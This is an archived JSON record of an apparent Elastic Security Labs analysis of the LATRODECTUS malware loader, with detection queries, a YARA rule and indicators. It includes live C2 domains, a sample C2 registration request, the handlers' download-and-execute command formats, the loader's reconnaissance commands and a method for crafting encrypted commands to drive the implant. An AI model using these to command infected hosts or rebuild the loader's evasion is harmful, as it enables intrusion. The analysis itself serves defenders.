{
	"id": "a5d73283-32c1-43cf-aeab-0db54c43fa48",
	"created_at": "2026-04-06T00:08:07.502423Z",
	"updated_at": "2026-04-10T03:35:21.37028Z",
	"deleted_at": null,
	"sha1_hash": "072929111694cfc003586a2f3544f38bb24a62b7",
	"title": "Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3437053,
	"plain_text": "Spring Cleaning with LATRODECTUS: A Potential Replacement for\r\nICEDID\r\nBy Daniel Stepanic, Samir Bousseaden\r\nPublished: 2024-05-16 · Archived: 2026-04-05 19:54:10 UTC\r\nLATRODECTUS at a glance\r\nFirst discovered by Walmart researchers in October of 2023, LATRODECTUS is a malware loader gaining popularity\r\namong cybercriminals. While this is considered a new family, there is a strong link between LATRODECTUS and ICEDID\r\ndue to behavioral and developmental similarities, including a command handler that downloads and executes encrypted\r\npayloads like ICEDID. Proofpoint and Team Cymru built upon this connection to discover a strong link between the\r\nnetwork infrastructure used by both the operators of ICEDID and LATRODECTUS.\r\nLATRODECTUS offers a comprehensive range of standard capabilities that threat actors can utilize to deploy further\r\npayloads, conducting various activities after initial compromise. The code base isn’t obfuscated and contains only 11\r\ncommand handlers focused on enumeration and execution. This type of loader represents a recent wave observed by our\r\nteam such as PIKABOT, where the code is more lightweight and direct with a limited number of handlers.\r\nThis article will focus on LATRODECTUS itself, analyzing its most significant features and sharing resources for\r\naddressing this financially impactful threat.\r\nKey takeaways\r\nInitially discovered by Walmart researchers last year, LATRODECTUS continues to gain adoption among recent\r\nfinancially-motivated campaigns\r\nLATRODECTUS, a possible replacement for ICEDID shares similarity to ICEDID including a command handler to\r\nexecute ICEDID payloads\r\nWe observed new event handlers (process discovery, desktop file listing) since its inception and integration of a self-delete technique to delete running files\r\nElastic Security provides a high degree of capability through memory signatures, behavioral rules, and hunting\r\nopportunities to respond to threats like LATRODECTUS\r\nLATRODECTUS campaign overview\r\nBeginning early March of 2024, Elastic Security Labs observed an increase in email campaigns delivering\r\nLATRODECTUS. These campaigns typically involve a recognizable infection chain involving oversized JavaScript files\r\nthat utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file, remotely hosted on a WEBDAV\r\nshare.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 1 of 26\n\nWith major changes in the loader space during the past year, such as the QBOT takedown and ICEDID dropping off, we are\r\nseeing new loaders such as PIKABOT and LATRODECTUS have emerged as possible replacements.\r\nLATRODECTUS analysis\r\nOur LATRODECTUS sample comes initially packed with file information masquerading as a component to Bitdefender’s\r\nkernel-mode driver (TRUFOS.SYS), shown in the following image.\r\nFile version information of packed LATRODECTUS sample\r\nIn order to move forward with malware analysis, the sample must be unpacked manually or via an automatic unpacking\r\nservice such as UnpacMe.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 2 of 26\n\nUnpacMe summary\r\nLATRODECTUS is a DLL with 4 different exports, and each export is assigned the same export address.\r\nExports for LATRODECTUS\r\nString obfuscation\r\nAll of the strings within LATRODECTUS are protected using a straightforward algorithm on the encrypted bytes and\r\napplying a transformation by performing arithmetic and bitwise operations. The initial report published in 2023 detailed a\r\nPRNG algorithm that was not observed in our sample, suggesting continuous development of this loader. Below is the\r\nalgorithm implemented in Python using our nightMARE framework:\r\ndef decrypt_string(encrypted_bytes: bytes) -\u003e bytes:\r\n x = cast.u32(encrypted_bytes[:4])\r\n y = cast.u16(encrypted_bytes[4:6])\r\n byte_size = cast.u16(cast.p32(x ^ y)[:2])\r\n decoded_bytes = bytearray(byte_size)\r\n for i, b in enumerate(encrypted_bytes[6 : 6 + byte_size]):\r\n decoded_bytes[i] = ((x + i + 1) ^ b) % 256\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 3 of 26\n\nreturn bytes(decoded_bytes)\r\nRuntime API\r\nLATRODECTUS obfuscates the majority of its imports until runtime. At the start of the program, it queries the PEB in\r\ncombination with using a CRC32 checksum to resolve kernel32.dll and ntdll.dll modules and their functions. In\r\norder to resolve additional libraries such as user32.dll or wininet.dll , the malware takes a different approach\r\nperforming a wildcard search ( *.dll ) in the Windows system directory. It retrieves each DLL filename and passes them\r\ndirectly to a CRC32 checksum function.\r\nDLL search using a CRC32 checksum\r\nAnti-analysis\r\nWhen all the imports are resolved, LATRODECTUS performs several serial anti-analysis checks. The first monitors for a\r\ndebugger by looking for the BeingDebugged flag inside the Process Environment Block (PEB). If a debugger is identified,\r\nthe program terminates.\r\nBeingDebugged check via PEB\r\nIn order to avoid sandboxes or virtual machines that may have a low number of active processes, two validation checks are\r\nused to combine the number of running processes with the OS product version.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 4 of 26\n\nNumber of processes and OS validation checks\r\nIn order to account for the major differences between Windows OS versions, the developer uses a custom enum based on the\r\nmajor/minor version, and build numbers within Windows.\r\nEnum related to build numbers, OS version\r\nThe two previous conditions translate to:\r\nLATRODECTUS will exit if the number of processes is less than 75 and the OS version is a recent build such as\r\nWindows 10, Windows Server 2016, or Windows 11\r\nLATRODECTUS will exit if the number of processes is less than 50 and the OS version is an older build such as\r\nWindows Server 2003 R2, Windows XP, Windows 2000, Windows 7, Windows 8, or Windows Server 2012/R2\r\nAfter the sandbox check, LATRODECTUS verifies if the current process is running under WOW64, a subsystem of\r\nWindows operating systems that allows for 32-bit applications to run on 64-bit systems. If true (running as a 32-bit\r\napplication on a 64-bit OS), the malware will exit.\r\nIsWow64Process check\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 5 of 26\n\nThe last check is based on verifying the MAC address via the GetAdaptersInfo() call from iphlpapi.dll . If there is no\r\nvalid MAC Address, the malware will also terminate.\r\nMAC Address check\r\nMutex\r\nThis malware uses the string runnung as the mutex to prevent re-infection on the host, which may be an accidental typo on\r\nthe part of developers.\r\nMutex\r\nHardware ID\r\nAfter the mutex creation, LATRODECTUS will generate a hardware ID that is seeded from the volume serial number of the\r\nmachine in combination with multiplying a hard-coded constant ( 0x19660D ).\r\nHWID calculation\r\nCampaign ID\r\nAt this stage, the decrypted campaign name ( Littlehw ) from our sample is used as a seed passed into a Fowler–Noll–Vo\r\nhashing function. This will produce a hash that is used by the actor to track different campaigns and associated victim\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 6 of 26\n\nmachines.\r\nCampaign ID calculation using FNV\r\nSetup / persistence\r\nThe malware will generate a folder path using a configuration parameter, these determine the location where\r\nLATRODECTUS will be dropped on disk, such as the following directories:\r\nAppData\r\nDesktop\r\nStartup\r\nPersonal\r\nLocal\\AppData\r\nOur sample was configured with the AppData location using a hard-coded directory string Custom_update along with a\r\nhardcoded filename Update_ concatenated with digits seeded from the volume serial number. Below is the full file path\r\ninside our VM:\r\nC:\\Users\\REM\\AppData\\Roaming\\Custom_update\\Update_88d58563.dll\r\nThe malware will check for an existing file AppData\\Roaming\\Custom_update\\update_data.dat to read from, and if the file\r\ndoes not exist it will create the directory before writing a copy of itself in the directory.\r\nLATRODECTUS written in AppData\r\nAfter the file is copied, LATRODECTUS retrieves two C2 domains from the global configuration, using the previously-described string decryption function.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 7 of 26\n\nDecrypting C2 servers\r\nBefore the main thread is executed for command dispatching, LATRODECTUS sets up a scheduled task for persistence\r\nusing the Windows Component Object Model (COM).\r\nScheduled task creation via COM\r\nIn our sample, the task name is hardcoded as Updater and scheduled to execute upon successful logon.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 8 of 26\n\nScheduled task properties\r\nSelf-deletion\r\nSelf-deletion is one noteworthy technique incorporated by LATRODECTUS. It was discovered by Jonas Lykkegaard and\r\nimplemented by Lloyd Davies in the delete-self-poc repo. The technique allows LATRODECTUS to delete itself while the\r\nprocess is still running using an alternate data stream.\r\nElastic Security Labs has seen this technique adopted in malware such as the ROOK ransomware family. The likely\r\nobjective is to hinder incident response processes by interfering with collection and analysis. The compiled malware\r\ncontains a string ( :wtfbbq ) present in the repository.\r\nSelf-deletion code in LATRODECTUS\r\nThis technique is observed at the start of the infection as well as when the malware performs an update using event handler\r\n#15. Elastic Security Labs has created a CAPA rule to help other organizations identify this behavior generically when\r\nanalyzing various malware.\r\nCommunication\r\nLATRODECTUS encrypts its requests using base64 and RC4 with a hardcoded password of 12345 . The first POST\r\nrequest over HTTPS that includes victim information along with configuration details, registering the infected system.\r\nPOST https://aytobusesre.com/live/ HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nHost: aytobusesre.com\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 9 of 26\n\nContent-Length: 256\r\nCache-Control: no-cache\r\nM1pNDFh7flKrBaDJqAPvJ98BTFDZdSDWDD8o3bMJbpmu0qdYv0FCZ0u6GtKSN0g//WHAS2npR/HDoLtIKBgkLwyrIh/3EJ+UR/0EKhYUzgm9K4DotfExUiX9FB\r\nInitial registration request\r\nBelow is an example of the decrypted contents sent in the first request:\r\ncounter=0\u0026type=1\u0026guid=249507485CA29F24F77B0F43D7BA\u0026os=6\u0026arch=1\u0026username=user\u0026group=510584660\u0026ver=1.1\u0026up=4\u0026direction=aytob\r\nName Description\r\ncounter Number of C2 requests increments by one for each callback\r\ntype Type of request (registration, etc)\r\nguid Generated hardware ID seeded by volume serial number\r\nos Windows OS product version\r\narch Windows architecture version\r\nusername Username of infected machine\r\ngroup Campaign identifier seeded by unique string in binary with FNV\r\nversion LATRODECTUS version\r\nup Unknown\r\ndirection C2 domain\r\nmac MAC Address\r\ncomputername Hostname of infected machine\r\ndomain Domain belonging to infected machine\r\nEach request is pipe-delimited by an object type, integer value, and corresponding argument. There are 4 object types which\r\nroute the attacker controlled commands (CLEARURL, URLS, COMMAND, ERROR).\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 10 of 26\n\nCommand dispatching logic\r\nThe main event handlers are passed through the COMMAND object type with the handler ID and their respective argument.\r\nCOMMAND|12|http://www.meow123.com/test\r\nThe CLEARURL object type is used to delete any configured domains. The URLS object type allows the attacker to swap\r\nto a new C2 URL. The last object type, ERROR, is not currently configured.\r\nExample of command request via CyberChef\r\nBot Functionality\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 11 of 26\n\nLATRODECTUS’s core functionality is driven through its command handlers. These handlers are used to collect\r\ninformation from the victim machine, provide execution capabilities as well as configure the implant. We have seen two\r\nadditional handlers (retrieve processes, desktop listing) added since the initial publication which may be a sign that the\r\ncodebase is still active and changing.\r\nCommand ID Description\r\n2 Retrieve file listing from desktop directory\r\n3 Retrieve process ancestry\r\n4 Collect system information\r\n12 Download and execute PE\r\n13 Download and execute DLL\r\n14 Download and execute shellcode\r\n15 Perform update, restart\r\n17 Terminate own process and threads\r\n18 Download and execute ICEDID payload\r\n19 Increase Beacon Timeout\r\n20 Resets request counter\r\nDesktop listing - command ID (2)\r\nThis command handler will retrieve a list of the contents of the user’s desktop, which the developer refers to as desklinks .\r\nThis data will be encrypted and appended to the outbound beacon request. This is used for enumerating and validating\r\nvictim environments quickly.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 12 of 26\n\nDesktop listing (Handler #2)\r\nExample request:\r\ncounter=0\u0026type=1\u0026guid=249507485CA29F24F77B0F43D7BA\u0026os=6\u0026arch=1\u0026username=user\u0026group=510584660\u0026ver=1.1\u0026up=4\u0026direction=aytob\r\nProcess ancestry - command ID (3)\r\nThis event handler is referenced as proclist by the developer where it collects the entire running process ancestry from the\r\ninfected machine via the CreateToolhelp32Snapshot API.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 13 of 26\n\nRetrieve process ancestry (Handler #3)\r\nLike security researchers, malware authors are interested in process parent/child relationships for decision-making. The\r\nauthors of LATRODECTUS even collect information about process grandchildren, likely to validate different compromised\r\nenvironments.\r\nExample of process ancestry collected by LATRODECTUS\r\nCollect system information - command ID (4)\r\nThis command handler creates a new thread that runs the following system discovery/enumeration commands, each of\r\nwhich is a potential detection opportunity:\r\nC:\\Windows\\System32\\cmd.exe /c ipconfig /all\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 14 of 26\n\nC:\\Windows\\System32\\cmd.exe /c systeminfo\r\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts\r\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts /all_trusts\r\nC:\\Windows\\System32\\cmd.exe /c net view /all /domain\r\nC:\\Windows\\System32\\cmd.exe /c net view /all\r\nC:\\Windows\\System32\\cmd.exe /c net group \"Domain Admins\" /domain\r\nC:\\Windows\\System32\\wbem\\wmic.exe /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:L\r\nC:\\Windows\\System32\\cmd.exe /c net config workstation\r\nC:\\Windows\\System32\\cmd.exe /c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get Displ\r\nC:\\Windows\\System32\\cmd.exe /c whoami /groups\r\nEach output is placed into URI with corresponding collected data:\r\n\u0026ipconfig=\r\n\u0026systeminfo=\r\n\u0026domain_trusts=\r\n\u0026domain_trusts_all=\r\n\u0026net_view_all_domain=\r\n\u0026net_view_all=\r\n\u0026net_group=\r\n\u0026wmic=\r\n\u0026net_config_ws=\r\n\u0026net_wmic_av=\r\n\u0026whoami_group=\r\nDownload and execute PE - command ID (12)\r\nThis handler downloads a PE file from the C2 server then writes the content to disk with a randomly generated file name,\r\nthen executes the file.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 15 of 26\n\nDownload and Run PE function (Handler #4)\r\nBelow is an example in our environment using this handler:\r\nProcess tree of download and run PE function\r\nDownload and execute DLL - command ID (13)\r\nThis command handler downloads a DLL from C2 server, writes it to disk with a randomly generated file name, and\r\nexecutes the DLL using rundll32.exe.\r\nDownload and run DLL function (Handler #13)\r\nDownload and execute shellcode - command (14)\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 16 of 26\n\nThis command handler downloads shellcode from the C2 server via InternetReadFile , allocates and copies the shellcode\r\ninto memory then directly calls it with a new thread pointing at the shellcode.\r\nShellcode execution (Handler #14)\r\nUpdate / restart - command ID (15)\r\nThis handler appears to perform a binary update to the malware where it’s downloaded, the existing thread/mutex is notified,\r\nand then released. The file is subsequently deleted and a new binary is downloaded/executed before terminating the existing\r\nprocess.\r\nUpdate handler (Handler #15)\r\nTerminate - command ID (17)\r\nThis handler will terminate the existing LATRODECTUS process.\r\nSelf-termination (Handler #17)\r\nDownload and execute hosted ICEID payload - command ID (18)\r\nThis command handler downloads two ICEDID components from a LATRODECTUS server and executes them using a\r\nspawned rundll32.exe process. We haven’t personally observed this being used in-the-wild, however.\r\nThe handler creates a folder containing two files to the AppData\\Roaming\\ directory. These file paths and filenames are\r\nseeded by a custom random number generator which we will review in the next section. In our case, this new folder location\r\nis:\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 17 of 26\n\nC:\\Users\\REM\\AppData\\Roaming\\-632116337\r\nIt retrieves a file ( test.dll ) from the C2 server, the standard ICEDID loader, which is written to disk with a randomly -\r\ngenerated file name ( -456638727.dll ).\r\nLATRODECTUS downloading ICEDID loader\r\nLATRODECTUS will then perform similar steps by generating a random filename for the ICEDID payload\r\n( 1431684209.dat ). Before performing the download, it will set-up the arguments to properly load ICEDID. If you have run\r\ninto ICEDID in the past, this part of the command-line should look familiar: it’s used to call the ICEDID export of the\r\nloader, while passing the relative path to the encrypted ICEDID payload file.\r\ninit -zzzz=\"-632116337\\1431684209.dat\"\r\nLATRODECTUS downloading ICEDID data\r\nLATRODECUS initiates a second download request using a hard-coded URI ( /files/bp.dat ) from the configured C2\r\nserver, which is written to a file ( 1431684209.dat ). Analyzing the bp.dat file, researchers identified it as a conventional\r\nencrypted ICEDID payload, commonly referenced as license.dat .\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 18 of 26\n\nEncrypted ICEDID payload (bp.dat)\r\nAfter decrypting the file, malware researchers noted a familiar 129 byte sequence of junk bytes prepended to the file\r\nfollowed by the custom section headers.\r\nDecrypted ICEDID payload (bp.dat)\r\nOur team was able to revisit prior tooling and successfully decrypt this file, enabling us to rebuild the PE (ICEDID).\r\nICEDID YARA triggering on rebuilt PE from bp.dat\r\nAt this point, the ICEDID loader and encrypted payload have been downloaded to the same folder.\r\nThese files are then executed together using rundll32.exe via CreateProcessW with their respective arguments. Below is\r\nthe observed command-line:\r\nrundll32.exe C:\\Users\\REM\\AppData\\Roaming\\-632116337\\-456638727.dll,init -zzzz=\"-632116337\\1431684209.dat\"\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 19 of 26\n\nRundll32.exe execution\r\nScanning the rundll32.exe child process spawned by LATRODECTUS with our ICEDID YARA rule also indicates the\r\npresence of the ICEDID.\r\nYARA memory scan detecting ICEDID\r\nBeacon timeout - command ID (19)\r\nLATRODECTUS supports jitter for beaconing to C2. This can make it harder for defenders to detect via network sources\r\ndue to randomness this introduces to beaconing intervals.\r\nAdjust timeout feature (Handler #19)\r\nIn order to calculate the timeout, it generates a random number by seeding a combination of the user’s cursor position on the\r\nscreen multiplied by the system’s uptime ( GetTickCount ). This result is passed as a parameter to RtlRandomEx.\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 20 of 26\n\nRandom number generator using cursor position\r\nReset counter - command ID (20)\r\nThis command handler will reset the request counter that is passed on each communication request. For example, on the\r\nthird callback it is filled with 3 here. With this function, the developer can reset the count starting from 0.\r\ncounter=3\u0026type=4\u0026guid=638507385\r\nLATRODECTUS / ICEDID connection\r\nThere definitely is some kind of development connection or working arrangement between ICEDID and LATRODECTUS.\r\nBelow are some of the similarities observed:\r\nSame enumeration commands in the system discovery handler\r\nThe DLL exports all point to same export function address, this was a common observation with ICEDID payloads\r\nC2 data is concatenated together as variables in the C2 traffic requests\r\nThe bp.dat file downloaded from handler (#18) is used to execute the ICEDID payload via rundll32.exe\r\nThe functions appear to be similarly coded\r\nCOM-based Scheduled Task setup - ICEDID vs LATRODECTUS\r\nResearchers didn’t conclude that there was a clear relationship between the ICEDID and LATRODECTUS families, though\r\nthey appear at least superficially affiliated. ICEDID possesses more mature capabilities, like those used for data theft or the\r\nBackConnect module, and has been richly documented over a period of several years. One hypothesis being considered is\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 21 of 26\n\nthat LATRODECTUS is being actively developed as a replacement for ICEDID, and the handler (#18) was included until\r\nmalware authors were satisfied with LATRODECTUS’ capabilities.\r\nSandboxing LATRODECTUS\r\nTo evaluate LATRODECTUS detections, we set up a Flask server configured with the different handlers to instruct an\r\ninfected machine to perform various actions in a sandbox environment. This method provides defenders with a great\r\nopportunity to assess the effectiveness of their detection and logging tools against every capability. Different payloads like\r\nshellcode/binaries can be exchanged as needed.\r\nCommand handlers sandboxed\r\nAs an example, for the download and execution of a DLL (handler #13), we can provide the following request structure\r\n(object type, handler, arguments for handler) to the command dispatcher:\r\nCOMMAND|13|http://www.meow123.com/dll, ShowMessage\r\nThe following example depicts the RC4-encrypted string described earlier, which has been base64-encoded.\r\nE3p1L21QSBOqEKjYrBKiLNZJTk7KZn+HWn0p2LQfOLWCz/py4VkkAxSXXdnDd39p2EU=\r\nUsing the following CyberChef recipe, analysts can generate encrypted command requests:\r\nExample with DLL Execution handler via CyberChef\r\nUsing the actual malware codebase and executing these different handlers using a low-risk framework, defenders can get a\r\nglimpse into the events, alerts, and logs recorded by their security instrumentation.\r\nDetecting LATRODECTUS\r\nThe following Elastic Defend protection features trigger during the LATRODECTUS malware infection process:\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 22 of 26\n\nElastic Defend alerts against LATRODECTUS\r\nBelow are the prebuilt MITRE ATT\u0026CK-aligned rules with descriptions:\r\nThe following list of hunts and detection queries can be used to detect LATRODECTUS post-exploitation commands\r\nfocused on execution:\r\nRundll32 Download PE/DLL (command handlers #12, #13 and #18):\r\nsequence by process.entity_id with maxspan=1s\r\n[file where event.action == \"creation\" and process.name : \"rundll32.exe\" and\r\n /* PE file header dropped to the InetCache folder */\r\nfile.Ext.header_bytes : \"4d5a*\" and file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\"]\r\n[network where process.name : \"rundll32.exe\" and\r\n event.action : (\"disconnect_received\", \"connection_attempted\") and\r\n /* network disconnect activity to a public Ip address */\r\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 23 of 26\n\nEQL Query using hunt detecting LATRODECTUS\r\nBelow is an ES|QL hunt to look for long-term and/or high count of network connections by rundll32 to a public IP address\r\n(which is uncommon):\r\nfrom logs-endpoint.events.network-*\r\n| where host.os.family == \"windows\" and event.category == \"network\" and\r\n network.direction == \"egress\" and process.name == \"rundll32.exe\" and\r\n/* excluding private IP ranges */\r\n not CIDR_MATCH(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.\r\n| keep source.bytes, destination.address, process.name, process.entity_id, process.pid, @timestamp, host.name\r\n/* calc total duration and the number of connections per hour */\r\n| stats count_connections = count(*), start_time = min(@timestamp), end_time = max(@timestamp) by process.entity_id, proc\r\n| eval duration = TO_DOUBLE(end_time)-TO_DOUBLE(start_time), duration_hours=TO_INT(duration/3600000), number_of_con_per_h\r\n| keep host.name, destination.address, process.name, process.pid, duration, duration_hours, number_of_con_per_hour, count\r\n| where count_connections \u003e= 100\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 24 of 26\n\nES|QL Query using hunt detecting LATRODECTUS\r\nBelow is a screenshot of Elastic Defend triggering on the LATRODECTUS memory signature:\r\nMemory signatures against LATRODECTUS via Elastic Defend\r\nYARA\r\nElastic Security has created YARA rules to identify LATRODECTUS:\r\nrule Windows_Trojan_LATRODECTUS_841ff697 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-03-13\"\r\n last_modified = \"2024-04-05\"\r\n license = \"Elastic License v2\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n threat_name = \"Windows.Trojan.LATRODECTUS\"\r\n reference_sample = \"aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c\"\r\n strings:\r\n $Str1 = { 48 83 EC 38 C6 44 24 20 73 C6 44 24 21 63 C6 44 24 22 75 C6 44 24 23 62 C6 44 24 24 }\r\n $crc32_loadlibrary = { 48 89 44 24 40 EB 02 EB 90 48 8B 4C 24 20 E8 ?? ?? FF FF 48 8B 44 24 40 48 81 C4 E8 02 00 0\r\n $delete_self = { 44 24 68 BA 03 00 00 00 48 8B 4C 24 48 FF 15 ED D1 00 00 85 C0 75 14 48 8B 4C 24 50 E8 ?? ?? 00 0\r\n $Str4 = { 89 44 24 44 EB 1F C7 44 24 20 00 00 00 00 45 33 C9 45 33 C0 33 D2 48 8B 4C 24 48 FF 15 7E BB 00 00 89 44\r\n $handler_check = { 83 BC 24 D8 01 00 00 12 74 36 83 BC 24 D8 01 00 00 0E 74 2C 83 BC 24 D8 01 00 00 0C 74 22 83 BC\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 25 of 26\n\n$hwid_calc = { 48 89 4C 24 08 48 8B 44 24 08 69 00 0D 66 19 00 48 8B 4C 24 08 89 01 48 8B 44 24 08 8B 00 C3 }\r\n $string_decrypt = { 89 44 24 ?? 48 8B 44 24 ?? 0F B7 40 ?? 8B 4C 24 ?? 33 C8 8B C1 66 89 44 24 ?? 48 8B 44 24 ?? 4\r\n $campaign_fnv = { 48 03 C8 48 8B C1 48 39 44 24 08 73 1E 48 8B 44 24 08 0F BE 00 8B 0C 24 33 C8 8B C1 89 04 24 69\r\n condition:\r\n 2 of them\r\n}\r\nObservations\r\nThe following observables were discussed in this research.\r\nObservable Type Name Reference\r\naee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c\r\nSHA-256\r\nTRUFOS.DLL LATRODECTUS\r\naytobusesre.com domain\r\nLATRODECTUS\r\nC2\r\nscifimond.com domain\r\nLATRODECTUS\r\nC2\r\ngyxplonto.com domain ICEDID C2\r\nneaachar.com domain ICEDID C2\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nhttps://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice\r\nTooling\r\nString decryption and IDA commenting tool\r\nSource: https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nhttps://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\r\nPage 26 of 26\n\nreference_sample strings: = \"aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c\"      \n$Str1 = { 48 83 EC 38 C6 44 24 20 73 C6 44 24 21 63 C6 44 24 22 75 C6 44 24 23 62 C6 44 24 24 } \n$crc32_loadlibrary = { 48 89 44 24 40 EB 02 EB 90 48 8B 4C 24 20 E8 ?? ?? FF FF 48 8B 44 24 40 48 81 C4 E8 02 00 0\n$delete_self = { 44 24 68 BA 03 00 00 00 48 8B 4C 24 48 FF 15 ED D1 00 00 85 C0 75 14 48 8B 4C 24 50 E8 ?? ?? 00 0\n$Str4 = { 89 44 24 44 EB 1F C7 44 24 20 00 00 00 00 45 33 C9 45 33 C0 33 D2 48 8B 4C 24 48 FF 15 7E BB 00 00 89 44\n$handler_check = { 83 BC 24 D8 01 00 00 12 74 36 83 BC 24 D8 01 00 00 0E 74 2C 83 BC 24 D8 01 00 00 0C 74 22 83 BC\n   Page 25 of 26",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus"
	],
	"report_names": [
		"spring-cleaning-with-latrodectus"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434087,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/072929111694cfc003586a2f3544f38bb24a62b7.pdf",
		"text": "https://archive.orkl.eu/072929111694cfc003586a2f3544f38bb24a62b7.txt",
		"img": "https://archive.orkl.eu/072929111694cfc003586a2f3544f38bb24a62b7.jpg"
	}
}